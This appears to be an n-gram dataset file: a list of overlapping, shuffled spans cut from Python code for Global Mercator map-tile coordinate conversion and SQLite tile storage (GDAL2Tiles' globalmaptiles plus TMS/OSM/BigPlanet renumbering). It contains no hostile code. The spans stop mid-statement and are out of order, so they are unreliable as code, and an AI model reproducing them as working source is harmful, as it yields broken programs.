ngram
listlengths
0
67.8k
[ "TMS Global Mercator pyramid\" self.tileSize = tileSize self.initialResolution = 2 * math.pi *", "GlobalGeodetic (based on EPSG:4326) for OpenLayers Base Map and Google Earth compatible tiles", "= math.log( math.tan((90 + lat) * math.pi / 360.0 )) / (math.pi /", "= 156543.03392804062 What is the difference between TMS and Google Maps/QuadTree tile name", "maxLat, maxLon = self.MetersToLatLon(bounds[2], bounds[3]) return ( minLat, minLon, maxLat, maxLon ) def", "always divided by two initialResolution = 20037508.342789244 * 2 / 256 = 156543.03392804062", "like to know where it was used. Class is available under the open-source", "the open-source GDAL license (www.gdal.org). \"\"\" MAXZOOMLEVEL = 32 class GlobalMercator(object): \"\"\" TMS", "int( math.ceil( px / float(self.tileSize) ) - 1 ) ty = int( math.ceil(", "-s_srs EPSG:4326 -t_srs EPSG:900913 Polar areas with abs(latitude) bigger then 85.05112878 are clipped", "\"Converts XY point from Spherical Mercator EPSG:900913 to lat/lon in WGS84 Datum\" lon", "px, py): \"Returns a tile covering region in given pixel coordinates\" tx =", "class SqliteTileStorage(): \"\"\" Sqlite files methods for simple tile storage\"\"\" def __init__(self, type):", "180.0 my = math.log( math.tan((90 + lat) * math.pi / 360.0 )) /", "- self.originShift my = py * res - self.originShift return mx, my def", "cur.execute( \"\"\" CREATE INDEX IND ON tiles(x,y,z,s) \"\"\") cur.execute(\"insert into info(desc, tilenumbering) values('Simple", "for simple tile storage\"\"\" def __init__(self, type): self.type=type def create(self, filename, overwrite=False): \"\"\"", "sqlite with BigPlanet numbering scheme from a TMS one\"\"\" target=SqliteTileStorage('BigPlanet') target.create(targetname, overwrite) cur", "notation (origin [0,0] in bottom-left). What coordinate conversions do we need for TMS", "zoom level (measured at Equator)\" # return (2 * math.pi * 6378137) /", "given mercator coordinates\" px, py = self.MetersToPixels( mx, my, zoom) return self.PixelsToTile( px,", "klokan at klokan dot cz. I would like to know where it was", "self.Resolution( zoom ) mx = px * res - self.originShift my = py", "is the coordinate extent of Earth in EPSG:900913? [-20037508.342789244, -20037508.342789244, 20037508.342789244, 20037508.342789244] Constant", "z) in res: xx= x zz= 17 - z yy= 2**zz - y", "yy= 2**zz - y im=self.readImage(x,y,z) target.writeImage(xx,yy,zz,im) def createOSMFromTMS(self, targetname, overwrite=False): \"\"\" Create a", "a single tile from string \"\"\" if (x, y, z) in self.written: return", "at: http://wiki.osgeo.org/wiki/Tile_Map_Service_Specification http://wiki.osgeo.org/wiki/WMS_Tiling_Client_Recommendation http://msdn.microsoft.com/en-us/library/bb259689.aspx http://code.google.com/apis/maps/documentation/overlays.html#Google_Maps_Coordinates Created by <NAME> on 2008-07-03. Google Summer of", "is the difference between TMS and Google Maps/QuadTree tile name convention? The tile", "on 2008-07-03. Google Summer of Code 2008, project GDAL2Tiles for OSGEO. In case", "res - self.originShift return mx, my def MetersToPixels(self, mx, my, zoom): \"Converts EPSG:900913", "bottom-left corner, id is XYZ. Google placed the origin [0,0] to the top-left", "projection: More info at http://spatialreference.org/ref/user/google-projection/ The same projection is degined as EPSG:3785. WKT", "coordinates in given zoom level\" res = self.Resolution( zoom ) px = (mx", "and tile coordinates are in TMS notation (origin [0,0] in bottom-left). What coordinate", "TMS one\"\"\" target=SqliteTileStorage('BigPlanet') target.create(targetname, overwrite) cur = self.db.cursor() cur.execute(\"select x, y, z from", "tiles (z, x, y,image) \\ # values (?,?,?,?)', # (z, x, y, sqlite3.Binary(f.read())))", "sqlite3.Binary(f.read()))) def createBigPlanetFromTMS(self, targetname, overwrite=False): \"\"\" Create a new sqlite with BigPlanet numbering", "if pixelSize > self.Resolution(i): if i!=0: return i-1 else: return 0 # We", "gdal2tiles.py 19288 2010-04-02 18:36:17Z rouault $ # VERSION MODIFIED FROM ORIGINAL, come with", "a OSM/Bing/Googlemaps one\"\"\" target=SqliteTileStorage('TMS') target.create(targetname, overwrite) cur = self.db.cursor() cur.execute(\"select x, y, z", "Google Earth compatible tiles More info at: http://wiki.osgeo.org/wiki/Tile_Map_Service_Specification http://wiki.osgeo.org/wiki/WMS_Tiling_Client_Recommendation http://msdn.microsoft.com/en-us/library/bb259689.aspx http://code.google.com/apis/maps/documentation/overlays.html#Google_Maps_Coordinates Created by", "tileSize=256): \"Initialize the TMS Global Mercator pyramid\" self.tileSize = tileSize self.initialResolution = 2", "EPSG:900913 and convert coordinates with PROJ.4? You can use standard GIS tools like", "whole region is on top of pyramid (zoom=0) covered by 256x256 pixels tile,", "from a OSM/Bing/Googlemaps one\"\"\" target=SqliteTileStorage('TMS') target.create(targetname, overwrite) cur = self.db.cursor() cur.execute(\"select x, y,", "by a QuadTree name, defined on the website: http://msdn2.microsoft.com/en-us/library/bb259689.aspx The lat/lon coordinates are", "filename, overwrite=False): \"\"\" Create a new storage file, overwrite or not if already", "# ============================================================================= # ============================================================================= __doc__globalmaptiles = \"\"\" globalmaptiles.py Global Map Tiles as defined", "of the given tile in latutude/longitude using WGS84 datum\" bounds = self.TileBounds( tx,", "CREATE TABLE IF NOT EXISTS info ( desc TEXT, tilenumbering TEXT, minzoom int,", "(2**zoom - 1) - ty for i in range(zoom, 0, -1): digit =", "TMS Global Mercator Profile --------------------------- Functions necessary for generation of tiles in Spherical", "lat/lon we are mentioning should use WGS84 Geodetic Datum. Well, the web clients", "origin is moved from bottom-left to top-left corner of the extent return tx,", "x, y, z from tiles\") res = cur.fetchall() for (x, y, z) in", "ty, zoom): \"Converts TMS tile coordinates to Google Tile coordinates\" # coordinate origin", "origin of pixel coordinates to top-left corner\" # # mapSize = self.tileSize <<", "Mercator Profile --------------------------- Functions necessary for generation of tiles in Spherical Mercator projection,", "QuadTree\" quadKey = \"\" ty = (2**zoom - 1) - ty for i", "(z, x, y,s,image) \\ values (?,?,?,?,?)', self.pending_images) self.pending_images = [] self.db.commit() def readImage(self,", "zoom ) px = (mx + self.originShift) / res py = (my +", "return tx, (2**zoom - 1) - ty def QuadTree(self, tx, ty, zoom ):", "pixels self.originShift = 2 * math.pi * 6378137 / 2.0 # 20037508.342789244 def", "coordinates by Spherical Mercator, so in fact lat/lon coordinates on sphere are treated", "y, z)) self.pending_images.append((z, x, y, 0, sqlite3.Binary(image))) if self.minzoom is None or z", "ty, zoom ): p1_lat, p1_lon, p3_lat, p3_lon = self.TileLatLonBounds(tx, ty, zoom) p2_lat, p2_lon,", "moved from bottom-left to top-left corner of the extent return tx, (2**zoom -", "the official EPSG database. Proj4 Text: +proj=merc +a=6378137 +b=6378137 +lat_ts=0.0 +lon_0=0.0 +x_0=0.0 +y_0=0", "#cur.execute('insert into tiles (z, x, y,image) \\ # values (?,?,?,?)', # (z, x,", "return (p1_lat, p1_lon, p2_lat, p2_lon, p3_lat, p3_lon, p4_lat, p4_lon) def Resolution(self, zoom ):", "Mercator\", GEOGCS[\"WGS 84\", DATUM[\"WGS_1984\", SPHEROID[\"WGS 84\",6378137,298.257223563, AUTHORITY[\"EPSG\",\"7030\"]], AUTHORITY[\"EPSG\",\"6326\"]], PRIMEM[\"Greenwich\",0], UNIT[\"degree\",0.0174532925199433], AUTHORITY[\"EPSG\",\"4326\"]], PROJECTION[\"Mercator_1SP\"], PARAMETER[\"central_meridian\",0],", "import sqlite3 import os import math __version__ = \"$Id: gdal2tiles.py 19288 2010-04-02 18:36:17Z", "180.0)) - math.pi / 2.0) return lat, lon def PixelsToMeters(self, px, pyr, zoom):", "due # to weird effect in AutoCreateWarpedVRT) # 2 bands: 1 grayscale, one", "= cur.fetchone() if res: image = str(res[0]) return image else : print (\"None", "math.pi / 360.0 )) / (math.pi / 180.0) my = my * self.originShift", "Global Mercator tiles:: LatLon <-> Meters <-> Pixels <-> Tile WGS84 coordinates Spherical", "supports -t_srs 'epsg:900913'. For other GIS programs check the exact definition of the", "Create a new sqlite with BigPlanet numbering scheme from a TMS one\"\"\" target=SqliteTileStorage('BigPlanet')", "OSGEO. In case you use this class in your product, translate it to", "given tile in latutude/longitude using WGS84 datum\" bounds = self.TileBounds( tx, ty, zoom)", "if self.maxzoom is None or z > self.maxzoom: self.maxzoom = z self.commitData() def", "(tx+1)*self.tileSize, (ty)*self.tileSize, zoom ) return ( minx, miny, maxx, maxy ) def TileLatLonBounds(self,", "res = cur.fetchall() for (x, y, z) in res: xx= x zz= z", "createFromDirectory(self, filename, basedir, overwrite=False) : \"\"\" Create a new sqlite file from a", "= z self.commitData() def commitData(self, force = False): if len(self.pending_images) > 500 or", "need for TMS Global Mercator tiles:: LatLon <-> Meters <-> Pixels <-> Tile", "int, s int, image blob, PRIMARY KEY(x,y,z,s)) \"\"\") cur.execute( \"\"\" CREATE TABLE IF", "UNIT[\"degree\",0.0174532925199433], AUTHORITY[\"EPSG\",\"4326\"]], PROJECTION[\"Mercator_1SP\"], PARAMETER[\"central_meridian\",0], PARAMETER[\"scale_factor\",1], PARAMETER[\"false_easting\",0], PARAMETER[\"false_northing\",0], UNIT[\"metre\",1, AUTHORITY[\"EPSG\",\"9001\"]]] \"\"\" def __init__(self, tileSize=256):", "PROJECTION[\"Mercator_1SP\"], PARAMETER[\"central_meridian\",0], PARAMETER[\"scale_factor\",1], PARAMETER[\"false_easting\",0], PARAMETER[\"false_northing\",0], UNIT[\"metre\",1, AUTHORITY[\"EPSG\",\"9001\"]]] \"\"\" def __init__(self, tileSize=256): \"Initialize the", "minLon, maxLat, maxLon ) def TileLatLonCorners(self, tx, ty, zoom ): p1_lat, p1_lon, p3_lat,", "Create a new storage file, overwrite or not if already exists\"\"\" self.filename=filename CREATEINDEX=True", "mercator coordinates\" px, py = self.MetersToPixels( mx, my, zoom) return self.PixelsToTile( px, py)", "all lat/lon we are mentioning should use WGS84 Geodetic Datum. Well, the web", "\"Move the origin of pixel coordinates to top-left corner\" # # mapSize =", "WebMapService Web Clients TileMapService What is the coordinate extent of Earth in EPSG:900913?", "are clipped off. What are zoom level constants (pixels/meter) for pyramid with EPSG:900913?", "< self.minzoom: self.minzoom = z if self.maxzoom is None or z > self.maxzoom:", "(2 * math.pi * 6378137) / (self.tileSize * 2**zoom) return self.initialResolution / (2**zoom)", "createTMSFromBigPlanet(self, targetname, overwrite=False): \"\"\" Create a new sqlite with TMS numbering scheme from", "scale distortion in the Y direction, which is not visually noticable. How do", "Y direction, which is not visually noticable. How do I create a raster", "return self.initialResolution / (2**zoom) def ZoomForPixelSize(self, pixelSize ): \"Maximal scaledown zoom of the", "of Earth in EPSG:900913? [-20037508.342789244, -20037508.342789244, 20037508.342789244, 20037508.342789244] Constant 20037508.342789244 comes from the", "EPSG:4326 -t_srs EPSG:900913 Polar areas with abs(latitude) bigger then 85.05112878 are clipped off.", "<-> Tile WGS84 coordinates Spherical Mercator Pixels in pyramid Tiles in pyramid lat/lon", "from the circumference of the Earth in meters, which is 40 thousand kilometers,", "pixel coordinates\" tx = int( math.ceil( px / float(self.tileSize) ) - 1 )", "z, f) #cur.execute('insert into tiles (z, x, y,image) \\ # values (?,?,?,?)', #", "QuadTree ----- --------- /------------/ KML, public WebMapService Web Clients TileMapService What is the", "generation of tiles in Spherical Mercator projection, EPSG:900913 (EPSG:gOOglE, Google Maps Global Mercator),", "mapSize - py def MetersToTile(self, mx, my, zoom): \"Returns tile for given mercator", "self.MetersToLatLon(bounds[2], bounds[3]) return ( minLat, minLon, maxLat, maxLon ) def TileLatLonCorners(self, tx, ty,", "1 ) ty = int( math.ceil( py / float(self.tileSize) ) - 1 )", "= self.tileSize << zoom # return px, mapSize - py def MetersToTile(self, mx,", "MetersToTile(self, mx, my, zoom): \"Returns tile for given mercator coordinates\" px, py =", "KML, public WebMapService Web Clients TileMapService What is the coordinate extent of Earth", "ON tiles(x,y,z,s) \"\"\") cur.execute(\"insert into info(desc, tilenumbering) values('Simple sqlite tile storage..', (?))\", (self.type,", "\\ <-> | | <-> /----/ <-> Google \\ / | | /--------/", "overwrite=False): \"\"\" Create a new sqlite with TMS numbering scheme from a OSM/Bing/Googlemaps", "py def PixelsToTile(self, px, py): \"Returns a tile covering region in given pixel", "visually noticable. How do I create a raster in EPSG:900913 and convert coordinates", "constant as: 2 * math.pi * 6378137 / 2.0 $ echo 180 85", "return px, mapSize - py def PixelsToTile(self, px, py): \"Returns a tile covering", "TMS tile coordinates to Google Tile coordinates\" # coordinate origin is moved from", "class in your product, translate it to another language or find it usefull", "else: return 0 # We don't want to scale up def GoogleTile(self, tx,", "PARAMETER[\"central_meridian\",0], PARAMETER[\"scale_factor\",1], PARAMETER[\"false_easting\",0], PARAMETER[\"false_northing\",0], UNIT[\"metre\",1, AUTHORITY[\"EPSG\",\"9001\"]]] \"\"\" def __init__(self, tileSize=256): \"Initialize the TMS", "EPSG:900913? [-20037508.342789244, -20037508.342789244, 20037508.342789244, 20037508.342789244] Constant 20037508.342789244 comes from the circumference of the", "return 0 # We don't want to scale up def GoogleTile(self, tx, ty,", "like Google Maps are projecting those coordinates by Spherical Mercator, so in fact", "Create a new sqlite with OSM/Bing/Googlemaps numbering scheme from a TMS one\"\"\" target=SqliteTileStorage('OSM')", "self.MetersToPixels( mx, my, zoom) return self.PixelsToTile( px, py) def TileBounds(self, tx, ty, zoom):", "web mapping applications. Pixel and tile coordinates are in TMS notation (origin [0,0]", "2**zz - y -1 im=self.readImage(x,y,z) target.writeImage(xx,yy,zz,im) def createTMSFromOSM(self, targetname, overwrite=False): \"\"\" Create a", "scheme from a TMS one\"\"\" target=SqliteTileStorage('OSM') target.create(targetname, overwrite) cur = self.db.cursor() cur.execute(\"select x,", "Clients TileMapService What is the coordinate extent of Earth in EPSG:900913? [-20037508.342789244, -20037508.342789244,", "= sqlite3.connect(self.filename) return True else: return False def close(self): self.commitData(force=True) cur = self.db.cursor()", "From MSDN documentation: To simplify the calculations, we use the spherical form of", "fact lat/lon coordinates on sphere are treated as if the were on the", "math.ceil( py / float(self.tileSize) ) - 1 ) return tx, ty #def PixelsToRaster(self,", "/ (math.pi / 180.0) my = my * self.originShift / 180.0 return mx,", "to Google Tile coordinates\" # coordinate origin is moved from bottom-left to top-left", "(x, y, z)) res = cur.fetchone() if res: image = str(res[0]) return image", "the web. It contains classes implementing coordinate conversions for: - GlobalMercator (based on", "EPSG:900913 to lat/lon in WGS84 Datum\" lon = (mx / self.originShift) * 180.0", "tile covering region in given pixel coordinates\" tx = int( math.ceil( px /", "in range(MAXZOOMLEVEL): if pixelSize > self.Resolution(i): if i!=0: return i-1 else: return 0", "to top-left corner\" # # mapSize = self.tileSize << zoom # return px,", "Ordnance Survey OpenSpace API, ... and you can overlay them on top of", "numbering scheme from a BigPlanet one\"\"\" target=SqliteTileStorage('TMS') target.create(targetname, overwrite) cur = self.db.cursor() cur.execute(\"select", "causes approximately 0.33 percent scale distortion in the Y direction, which is not", "from a BigPlanet one\"\"\" target=SqliteTileStorage('TMS') target.create(targetname, overwrite) cur = self.db.cursor() cur.execute(\"select x, y,", "PARAMETER[\"scale_factor\",1], PARAMETER[\"false_easting\",0], PARAMETER[\"false_northing\",0], UNIT[\"metre\",1, AUTHORITY[\"EPSG\",\"9001\"]]] \"\"\" def __init__(self, tileSize=256): \"Initialize the TMS Global", "QuadTree(self, tx, ty, zoom ): \"Converts TMS tile coordinates to Microsoft QuadTree\" quadKey", "for map display, and not for displaying numeric coordinates, we don't need the", "I would like to know where it was used. Class is available under", "2010-04-02 18:36:17Z rouault $ # VERSION MODIFIED FROM ORIGINAL, come with no warranty", "Microsoft Virtual Earth, Yahoo Maps, UK Ordnance Survey OpenSpace API, ... and you", "tile in EPSG:900913 coordinates\" minx, miny = self.PixelsToMeters( tx*self.tileSize, (ty+1)*self.tileSize, zoom ) maxx,", "<-> /----/ <-> Google \\ / | | /--------/ QuadTree ----- --------- /------------/", "return i-1 else: return 0 # We don't want to scale up def", "in os.listdir(basedir+'/'+zs+'/'): xx=int(xs) for ys in os.listdir(basedir+'/'+zs+'/'+'/'+xs+'/'): yy=int(ys.split('.')[0]) print (zz, yy, xx) z=zz", "reference is XYZ. Microsoft is referencing tiles by a QuadTree name, defined on", "map display, and not for displaying numeric coordinates, we don't need the extra", "pyramid closest to the pixelSize.\" for i in range(MAXZOOMLEVEL): if pixelSize > self.Resolution(i):", "x=xx y=yy print (basedir+'/'+zs+'/'+'/'+xs+'/'+ys) f=open(basedir+'/'+zs+'/'+'/'+xs+'/'+ys) self.writeImageFile(x, y, z, f) #cur.execute('insert into tiles (z,", "or force: cur = self.db.cursor() cur.executemany('insert into tiles (z, x, y,s,image) \\ values", "another language or find it usefull for your project please let me know.", "up def GoogleTile(self, tx, ty, zoom): \"Converts TMS tile coordinates to Google Tile", "pyr res = self.Resolution( zoom ) mx = px * res - self.originShift", "self.db = sqlite3.connect(self.filename) cur = self.db.cursor() cur.execute( \"\"\" CREATE TABLE IF NOT EXISTS", "2010-04-02 18:36:17Z rouault $\" class SqliteTileStorage(): \"\"\" Sqlite files methods for simple tile", "self.type=type def create(self, filename, overwrite=False): \"\"\" Create a new storage file, overwrite or", "y, 0, sqlite3.Binary(image))) if self.minzoom is None or z < self.minzoom: self.minzoom =", "in Spherical Mercator EPSG:900913\" mx = lon * self.originShift / 180.0 my =", "from bottom-left to top-left corner of the extent return tx, (2**zoom - 1)", "+units=m +nadgrids=@null +no_defs Human readable WKT format of EPGS:900913: PROJCS[\"Google Maps Global Mercator\",", "* math.atan( math.exp( lat * math.pi / 180.0)) - math.pi / 2.0) return", "IND ON tiles(x,y,z,s) \"\"\") cur.execute(\"insert into info(desc, tilenumbering) values('Simple sqlite tile storage..', (?))\",", "= \"\"\" globalmaptiles.py Global Map Tiles as defined in Tile Map Service (TMS)", "\"Converts given lat/lon in WGS84 Datum to XY in Spherical Mercator EPSG:900913\" mx", "20037508.342789244] Constant 20037508.342789244 comes from the circumference of the Earth in meters, which", "= self.TileLatLonBounds(tx+1, ty, zoom) p4_lat, p4_lon, _, _ = self.TileLatLonBounds(tx, ty-1, zoom) return", "y=? and z=?\", (x, y, z)) res = cur.fetchone() if res: image =", "use this class in your product, translate it to another language or find", "pyramid\" self.tileSize = tileSize self.initialResolution = 2 * math.pi * 6378137 / self.tileSize", "self.db.cursor() cur.execute(\"UPDATE Info SET minzoom = (?), maxzoom = (?)\", (self.minzoom, self.maxzoom)) self.db.commit()", "lon ): \"Converts given lat/lon in WGS84 Datum to XY in Spherical Mercator", "or z < self.minzoom: self.minzoom = z if self.maxzoom is None or z", "one\"\"\" target=SqliteTileStorage('BigPlanet') target.create(targetname, overwrite) cur = self.db.cursor() cur.execute(\"select x, y, z from tiles\")", ")) / (math.pi / 180.0) my = my * self.originShift / 180.0 return", "* (2 * math.atan( math.exp( lat * math.pi / 180.0)) - math.pi /", "From $Id: gdal2tiles.py 19288 2010-04-02 18:36:17Z rouault $ # VERSION MODIFIED FROM ORIGINAL,", "format of EPGS:900913: PROJCS[\"Google Maps Global Mercator\", GEOGCS[\"WGS 84\", DATUM[\"WGS_1984\", SPHEROID[\"WGS 84\",6378137,298.257223563, AUTHORITY[\"EPSG\",\"7030\"]],", "echo 180 85 | gdaltransform -s_srs EPSG:4326 -t_srs EPSG:900913 Polar areas with abs(latitude)", "in res: xx= x zz= 17 - z yy= 2**zz - y -1", "= self.MetersToPixels( mx, my, zoom) return self.PixelsToTile( px, py) def TileBounds(self, tx, ty,", "if (x, y, z) in self.written: return self.written.add((x, y, z)) self.pending_images.append((z, x, y,", "def create(self, filename, overwrite=False): \"\"\" Create a new storage file, overwrite or not", "storage file, overwrite or not if already exists\"\"\" self.filename=filename CREATEINDEX=True if overwrite: if", "at klokan dot cz. I would like to know where it was used.", "maxy ) def TileLatLonBounds(self, tx, ty, zoom ): \"Returns bounds of the given", "= self.TileLatLonBounds(tx, ty, zoom) p2_lat, p2_lon, _ , _ = self.TileLatLonBounds(tx+1, ty, zoom)", "a new sqlite with TMS numbering scheme from a BigPlanet one\"\"\" target=SqliteTileStorage('TMS') target.create(targetname,", "is None or z > self.maxzoom: self.maxzoom = z self.commitData() def commitData(self, force", "sqlite3.connect(self.filename) return True else: return False def close(self): self.commitData(force=True) cur = self.db.cursor() cur.execute(\"UPDATE", "zoom) p4_lat, p4_lon, _, _ = self.TileLatLonBounds(tx, ty-1, zoom) return (p1_lat, p1_lon, p2_lat,", "numeric coordinates, we don't need the extra precision of an ellipsoidal projection. The", "self.db.cursor() cur.execute( \"\"\" CREATE TABLE IF NOT EXISTS tiles ( x int, y", "f) : \"\"\" write a single tile from a file \"\"\" self.writeImage(x, y,", "Created by <NAME> on 2008-07-03. Google Summer of Code 2008, project GDAL2Tiles for", "in EPSG:900913 coordinates\" minx, miny = self.PixelsToMeters( tx*self.tileSize, (ty+1)*self.tileSize, zoom ) maxx, maxy", "image blob, PRIMARY KEY(x,y,z,s)) \"\"\") cur.execute( \"\"\" CREATE TABLE IF NOT EXISTS info", "into tiles (z, x, y,s,image) \\ values (?,?,?,?,?)', self.pending_images) self.pending_images = [] self.db.commit()", ") return tx, ty #def PixelsToRaster(self, px, py, zoom): # \"Move the origin", "= [] self.db.commit() def readImage(self, x, y, z) : \"\"\" read a single", "in latutude/longitude using WGS84 datum\" bounds = self.TileBounds( tx, ty, zoom) minLat, minLon", "Spherical Mercator projection, EPSG:900913 (EPSG:gOOglE, Google Maps Global Mercator), EPSG:3785, OSGEO:41001. Such tiles", "\"\"\" Create a new sqlite with TMS numbering scheme from a BigPlanet one\"\"\"", "lon def PixelsToMeters(self, px, pyr, zoom): \"Converts pixel coordinates in given zoom level", "directory structure\"\"\" self.create(filename, overwrite) for zs in os.listdir(basedir): zz=int(zs) for xs in os.listdir(basedir+'/'+zs+'/'):", "1 ) return tx, ty #def PixelsToRaster(self, px, py, zoom): # \"Move the", "cs2cs or gdaltransform. All of the tools supports -t_srs 'epsg:900913'. For other GIS", "y, sqlite3.Binary(f.read()))) def createBigPlanetFromTMS(self, targetname, overwrite=False): \"\"\" Create a new sqlite with BigPlanet", "origin [0,0] to the top-left corner, reference is XYZ. Microsoft is referencing tiles", "then 85.05112878 are clipped off. What are zoom level constants (pixels/meter) for pyramid", "are zoom level constants (pixels/meter) for pyramid with EPSG:900913? whole region is on", "XY pixels Z zoom XYZ from TMS EPSG:4326 EPSG:900913 .----. --------- -- TMS", "GoogleTile(self, tx, ty, zoom): \"Converts TMS tile coordinates to Google Tile coordinates\" #", "x, y, 0, sqlite3.Binary(image))) if self.minzoom is None or z < self.minzoom: self.minzoom", "OpenSpace API, ... and you can overlay them on top of base maps", "None or z > self.maxzoom: self.maxzoom = z self.commitData() def commitData(self, force =", "to pyramid pixel coordinates in given zoom level\" res = self.Resolution( zoom )", "like gdalwarp, cs2cs or gdaltransform. All of the tools supports -t_srs 'epsg:900913'. For", "p4_lon) def Resolution(self, zoom ): \"Resolution (meters/pixel) for given zoom level (measured at", "commitData(self, force = False): if len(self.pending_images) > 500 or force: cur = self.db.cursor()", "bounds of the given tile in EPSG:900913 coordinates\" minx, miny = self.PixelsToMeters( tx*self.tileSize,", "0.33 percent scale distortion in the Y direction, which is not visually noticable.", "px, py = self.MetersToPixels( mx, my, zoom) return self.PixelsToTile( px, py) def TileBounds(self,", "6378137 / self.tileSize # 156543.03392804062 for tileSize 256 pixels self.originShift = 2 *", "(based on EPSG:4326) for OpenLayers Base Map and Google Earth compatible tiles More", "1 if (ty & mask) != 0: digit += 2 quadKey += str(digit)", "zoom ) return ( minx, miny, maxx, maxy ) def TileLatLonBounds(self, tx, ty,", "- math.pi / 2.0) return lat, lon def PixelsToMeters(self, px, pyr, zoom): \"Converts", "def open(self, filename) : \"\"\" Open an existing file\"\"\" self.filename=filename if os.path.isfile(self.filename): self.db", "the website: http://msdn2.microsoft.com/en-us/library/bb259689.aspx The lat/lon coordinates are using WGS84 datum, yeh? Yes, all", "def PixelsToMeters(self, px, pyr, zoom): \"Converts pixel coordinates in given zoom level of", "the given tile in latutude/longitude using WGS84 datum\" bounds = self.TileBounds( tx, ty,", "lon = (mx / self.originShift) * 180.0 lat = (my / self.originShift) *", "convert coordinates with PROJ.4? You can use standard GIS tools like gdalwarp, cs2cs", "(my + self.originShift) / res mapSize = self.tileSize << zoom return px, mapSize", "p4_lat, p4_lon) def Resolution(self, zoom ): \"Resolution (meters/pixel) for given zoom level (measured", "os.path.isfile(self.filename): os.unlink(self.filename) else: if os.path.isfile(self.filename): CREATEINDEX=False self.db = sqlite3.connect(self.filename) cur = self.db.cursor() cur.execute(", "How do I create a raster in EPSG:900913 and convert coordinates with PROJ.4?", "-1 im=self.readImage(x,y,z) target.writeImage(xx,yy,zz,im) def createTMSFromBigPlanet(self, targetname, overwrite=False): \"\"\" Create a new sqlite with", "form. Since the projection is used only for map display, and not for", "= [] def open(self, filename) : \"\"\" Open an existing file\"\"\" self.filename=filename if", "applications. Pixel and tile coordinates are in TMS notation (origin [0,0] in bottom-left).", "156543.03392804062 for tileSize 256 pixels self.originShift = 2 * math.pi * 6378137 /", "forced due # to weird effect in AutoCreateWarpedVRT) # 2 bands: 1 grayscale,", "/ \\ <-> | | <-> /----/ <-> Google \\ / | |", "Mercator pyramid\" self.tileSize = tileSize self.initialResolution = 2 * math.pi * 6378137 /", "numbering scheme from a TMS one\"\"\" target=SqliteTileStorage('OSM') target.create(targetname, overwrite) cur = self.db.cursor() cur.execute(\"select", "http://msdn2.microsoft.com/en-us/library/bb259689.aspx The lat/lon coordinates are using WGS84 datum, yeh? Yes, all lat/lon we", "= self.PixelsToMeters( tx*self.tileSize, (ty+1)*self.tileSize, zoom ) maxx, maxy = self.PixelsToMeters( (tx+1)*self.tileSize, (ty)*self.tileSize, zoom", "with TMS numbering scheme from a OSM/Bing/Googlemaps one\"\"\" target=SqliteTileStorage('TMS') target.create(targetname, overwrite) cur =", "and Google Earth compatible tiles More info at: http://wiki.osgeo.org/wiki/Tile_Map_Service_Specification http://wiki.osgeo.org/wiki/WMS_Tiling_Client_Recommendation http://msdn.microsoft.com/en-us/library/bb259689.aspx http://code.google.com/apis/maps/documentation/overlays.html#Google_Maps_Coordinates Created", "implementing coordinate conversions for: - GlobalMercator (based on EPSG:900913 = EPSG:3785) for Google", "coordinates are in TMS notation (origin [0,0] in bottom-left). What coordinate conversions do", "tx, ty #def PixelsToRaster(self, px, py, zoom): # \"Move the origin of pixel", "Earth in EPSG:900913? [-20037508.342789244, -20037508.342789244, 20037508.342789244, 20037508.342789244] Constant 20037508.342789244 comes from the circumference", "= px * res - self.originShift my = py * res - self.originShift", "http://wiki.osgeo.org/wiki/WMS_Tiling_Client_Recommendation http://msdn.microsoft.com/en-us/library/bb259689.aspx http://code.google.com/apis/maps/documentation/overlays.html#Google_Maps_Coordinates Created by <NAME> on 2008-07-03. Google Summer of Code 2008,", "+a=6378137 +b=6378137 +lat_ts=0.0 +lon_0=0.0 +x_0=0.0 +y_0=0 +k=1.0 +units=m +nadgrids=@null +no_defs Human readable WKT", "============================================================================= # ============================================================================= # ============================================================================= __doc__globalmaptiles = \"\"\" globalmaptiles.py Global Map Tiles as", ": \"\"\" write a single tile from string \"\"\" if (x, y, z)", "cur.execute(\"select image from tiles where x=? and y=? and z=?\", (x, y, z))", "zoom # return px, mapSize - py def MetersToTile(self, mx, my, zoom): \"Returns", "and z=?\", (x, y, z)) res = cur.fetchone() if res: image = str(res[0])", "yy= 2**zz - y -1 im=self.readImage(x,y,z) target.writeImage(xx,yy,zz,im) def createTMSFromOSM(self, targetname, overwrite=False): \"\"\" Create", "What are zoom level constants (pixels/meter) for pyramid with EPSG:900913? whole region is", "yy= 2**zz - y -1 im=self.readImage(x,y,z) target.writeImage(xx,yy,zz,im) def createTMSFromBigPlanet(self, targetname, overwrite=False): \"\"\" Create", "extent, projection, pixel size), there is just different identification of the same raster", "math.pi / 2.0) return lat, lon def PixelsToMeters(self, px, pyr, zoom): \"Converts pixel", "TMS are counted from [0,0] in the bottom-left corner, id is XYZ. Google", "p4_lon, _, _ = self.TileLatLonBounds(tx, ty-1, zoom) return (p1_lat, p1_lon, p2_lat, p2_lon, p3_lat,", "(p1_lat, p1_lon, p2_lat, p2_lon, p3_lat, p3_lon, p4_lat, p4_lon) def Resolution(self, zoom ): \"Resolution", "into tiles (z, x, y,image) \\ # values (?,?,?,?)', # (z, x, y,", "TileLatLonCorners(self, tx, ty, zoom ): p1_lat, p1_lon, p3_lat, p3_lon = self.TileLatLonBounds(tx, ty, zoom)", "mapSize = self.tileSize << zoom return px, mapSize - py def PixelsToTile(self, px,", "itself is the same (equal extent, projection, pixel size), there is just different", "= self.tileSize << zoom py = mapSize - pyr res = self.Resolution( zoom", "would like to know where it was used. Class is available under the", "Human readable WKT format of EPGS:900913: PROJCS[\"Google Maps Global Mercator\", GEOGCS[\"WGS 84\", DATUM[\"WGS_1984\",", "(basedir+'/'+zs+'/'+'/'+xs+'/'+ys) f=open(basedir+'/'+zs+'/'+'/'+xs+'/'+ys) self.writeImageFile(x, y, z, f) #cur.execute('insert into tiles (z, x, y,image) \\", "is not visually noticable. How do I create a raster in EPSG:900913 and", "my = py * res - self.originShift return mx, my def MetersToPixels(self, mx,", "(?,?,?,?)', # (z, x, y, sqlite3.Binary(f.read()))) def createBigPlanetFromTMS(self, targetname, overwrite=False): \"\"\" Create a", "\"Converts pixel coordinates in given zoom level of pyramid to EPSG:900913\" mapSize =", "createOSMFromTMS(self, targetname, overwrite=False): \"\"\" Create a new sqlite with OSM/Bing/Googlemaps numbering scheme from", "on top of base maps of those web mapping applications. Pixel and tile", "Geodetic Datum. Well, the web clients like Google Maps are projecting those coordinates", "/ 180.0 my = math.log( math.tan((90 + lat) * math.pi / 360.0 ))", "MAXZOOMLEVEL = 32 class GlobalMercator(object): \"\"\" TMS Global Mercator Profile --------------------------- Functions necessary", "(my / self.originShift) * 180.0 lat = 180 / math.pi * (2 *", "math.pi * 